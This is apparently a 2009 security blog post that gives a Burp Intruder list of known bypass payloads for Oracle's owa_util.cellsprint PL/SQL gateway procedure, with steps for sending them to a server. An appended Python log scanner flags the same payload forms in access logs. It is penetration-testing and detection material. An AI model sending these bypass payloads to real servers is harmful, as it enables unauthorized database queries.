Thursday, September 24, 2009

BToD > Intruder & Probing for Oracle's OWA_UTIL stored procedure


Today I am just giving a cheat sheet for loading into Burp via the Intruder > Preset List Payload Set. This list contains known Oracle owa_util.cellsprint bypasses (all but the first entry, which is the plain request). This way you can detect whether or not you have a vulnerable stored procedure. It's probably not a good idea to have the PL/SQL gateway out in the open, but if it is, now you can detect whether or not it's easily exploited.

The preset list contains:

owa_util.cellsprint?p_thequery=select+1+from+dual
%0Aowa_util.cellsprint?p_thequery=select+1+from+dual
S%FFS.owa_util.cellsprint?p_thequery=select+1+from+dual
*SYS*.owa_util.cellsprint?p_thequery=select+1+from+dual
<<"LBL">>owa_util.cellsprint?p_thequery=select+1+from+dual

NOTE: STRIP THE QUOTATION MARKS OUT FROM ENCLOSING LBL SO IT IS ONLY LBL. I just had to enclose them to bypass blogspot's filter.


So create a Notepad file containing this list, then send the request for http://server.example.com/pls/dad/vulnerable_procedure to Intruder.

Navigate to Intruder > Positions and add position markers around vulnerable_procedure like so:




Navigate to > Payload Preset List and click 'load':




Open the Oracle payload file:





Then start!




If you have a 403 response you know you won't be able to access this. Otherwise, game on.
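The same 403-versus-anything-else signal can be read from the defender's side. The following is an added example, not part of the original post: it scans web server access log lines for PL/SQL gateway requests that name owa_util, labels the prefix form used, and records whether the gateway answered 403. The log format, sample entries, IP addresses and function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Request line and status code from a common/combined-format access log entry.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Procedure segment of a PL/SQL gateway path: /pls/<dad>/<procedure>
PROC_RE = re.compile(rb"^/pls/[^/]+/(?P<proc>.*)", re.S)
TARGET = b"owa_util."

# Constructed sample entries (not real traffic); DAD name and IPs are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2009:10:00:01 +0000] "GET /pls/dad/owa_util.cellsprint?p_thequery=select+1+from+dual HTTP/1.1" 403 226',
    '192.0.2.10 - - [24/Sep/2009:10:00:02 +0000] "GET /pls/dad/%0Aowa_util.cellsprint?p_thequery=select+1+from+dual HTTP/1.1" 200 512',
    '192.0.2.10 - - [24/Sep/2009:10:00:03 +0000] "GET /pls/dad/S%FFS.owa_util.cellsprint?p_thequery=select+1+from+dual HTTP/1.1" 403 226',
    '192.0.2.44 - - [24/Sep/2009:10:00:09 +0000] "GET /pls/dad/home.show HTTP/1.1" 200 1024',
]

def classify_prefix(prefix: bytes) -> str:
    """Name the form of whatever precedes owa_util in the procedure segment."""
    if not prefix:
        return "plain"
    if prefix[:1].isspace():
        return "leading-whitespace"   # e.g. %0A
    if b"\xff" in prefix:
        return "0xff-in-schema"       # e.g. S%FFS.
    if prefix.startswith(b"<<"):
        return "label-prefix"         # e.g. <<LBL>>
    return "other-prefix"             # any other schema or wrapper text

def scan(lines):
    """Return (form, status, blocked) for each gateway request naming owa_util."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        # Decode only the path, so %0A and %FF are seen as the bytes the gateway sees.
        path = unquote_to_bytes(m["url"].split("?", 1)[0])
        p = PROC_RE.match(path)
        proc = p["proc"].lower() if p else b""
        idx = proc.find(TARGET)
        if idx < 0:
            continue
        status = int(m["status"])
        findings.append((classify_prefix(proc[:idx]), status, status == 403))
    return findings

if __name__ == "__main__":
    for form, status, blocked in scan(SAMPLE_LOG):
        print(f"{form:20} status={status} {'blocked' if blocked else 'NOT BLOCKED'}")
```

Any finding with a status other than 403 means the request reached the procedure and deserves review first.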


Happy Hacking!
cktricky
